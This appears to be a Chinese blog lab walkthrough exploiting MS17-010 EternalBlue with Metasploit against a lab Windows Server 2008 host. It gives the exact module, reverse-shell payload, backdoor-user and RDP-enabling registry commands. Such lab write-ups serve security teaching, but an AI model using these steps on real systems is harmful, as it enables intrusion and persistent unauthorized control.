用到的试验机
kali ip 192.168.1.106
windows2008 ip 192.168.1.107
用kali扫描靶机端口
这里看到445端口是开放的,可以利用17_010
使用命令msfconsole启动metasploit渗透测试平台
使用命令search 17_010搜索漏洞的模块
先利用命令 来调用漏洞扫描模块
use auxiliary/scanner/smb/smb_ms17_010
设置目标ip或网段
set RHOSTS 192.168.1.107
执行扫描:run
出现这种状况,就说明这个靶机有这个漏洞的存在
我们调用攻击模块,使用命令
use exploit/windows/smb/ms17_010_eternalblue
设置目标ip或网段
set RHOSTS 192.168.1.107
show options查看设置参数
设置攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
执行攻击:run
攻击成功!
拿到shell
输入chcp 65001可以解决乱码问题
接下来就是通过shell对靶机进行控制
创建用户,
创建成功并提权
提权成功
在一开始的扫描并没有发现3389端口开启,所以使用命令开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3389端口开启
然后使用rdesktop远程桌面连接2008,使用提权的用户进入桌面
使用hack用户登录
登录成功
以上只是一个演示,17_010漏洞还是很危险的
标签:set,ip,端口,192.168,010,漏洞,MS17 From: https://www.cnblogs.com/xwsfw/p/16859549.html